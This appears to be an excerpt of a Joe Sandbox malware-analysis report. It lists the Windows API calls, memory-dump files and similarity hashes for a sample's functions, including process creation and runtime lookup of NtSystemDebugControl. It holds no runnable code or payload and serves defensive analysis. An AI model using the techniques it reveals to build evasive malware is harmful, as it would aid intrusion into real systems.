                            APIs
                            • memset.MSVCRT ref: 00C018B1
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 00C018D3
                            • CloseHandle.KERNEL32(00C02549), ref: 00C018E9
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C018F0
                            • GetExitCodeProcess.KERNEL32(?,00C02549), ref: 00C01901
                            • CloseHandle.KERNEL32(?), ref: 00C0190A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                            • String ID:
                            • API String ID: 876959470-0
                            • Opcode ID: 7f004dcb8346c247314daaf83852298f4581847b9a6b8435274d565bc6bd3784
                            • Instruction ID: 50822f393c5f5373f2ab0a08b09c65c7304c32bf39685b57989136272c3a4a43
                            • Opcode Fuzzy Hash: 7f004dcb8346c247314daaf83852298f4581847b9a6b8435274d565bc6bd3784
                            • Instruction Fuzzy Hash: CC017C72901168BFDB21ABD6DC48EDFBF3DEF85724F104121FA15A51A0D6314A18CAA0
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00C01334
                            • GetProcAddress.KERNEL32(00000000), ref: 00C0133B
                            • memset.MSVCRT ref: 00C01359
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProcmemset
                            • String ID: NtSystemDebugControl$ntdll.dll
                            • API String ID: 3137504439-2438149413
                            • Opcode ID: 99f4095b99aa91923f4d3d6b1feadb99c11e8d9439f0d8416d153c10429f023b
                            • Instruction ID: adb0e93cb25ed0b76cb2685bccd2a02305140bbb4b7d5e322ab8739dc8392786
                            • Opcode Fuzzy Hash: 99f4095b99aa91923f4d3d6b1feadb99c11e8d9439f0d8416d153c10429f023b
                            • Instruction Fuzzy Hash: 5D016971A01309AFDB10DFA9AC89AAFBBACFB45314F04413AF951A21A0E2709A05CA51
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: strrchr$lstrcmpilstrcpylstrlen
                            • String ID:
                            • API String ID: 3636361484-0
                            • Opcode ID: 96a08fee5576078cf82dc70c0d775cb1628e858b84416c74a359ffec8075f1a3
                            • Instruction ID: d932a05b267ebae3347f353bcc1a5371e7d868284407fac6741e6c3338a1420a
                            • Opcode Fuzzy Hash: 96a08fee5576078cf82dc70c0d775cb1628e858b84416c74a359ffec8075f1a3
                            • Instruction Fuzzy Hash: F401D6B29042596FEF205760EC4CBDFB79CDB04354F490066EF55E20D0EA749E84CBA0
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00C0603C
                            • GetProcAddress.KERNEL32(00000000,00C06064), ref: 00C0604F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                            • Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: kernel32.dll
                            • API String ID: 1646373207-1793498882
                            • Opcode ID: 77e48cba5bc978512cb14b964f64b67d2f163ca4b4225a7b870a3b3b023fcbb8
                            • Instruction ID: f34d61d3ac505ae507c2f0411a4ad90c590de356a059a2bbe133dee359d6bc83
                            • Opcode Fuzzy Hash: 77e48cba5bc978512cb14b964f64b67d2f163ca4b4225a7b870a3b3b023fcbb8
                            • Instruction Fuzzy Hash: DDF0CDB11402898BEF70CEA4CC44BDE3BE4EB05700F50442AEA09CB281CB348615CB28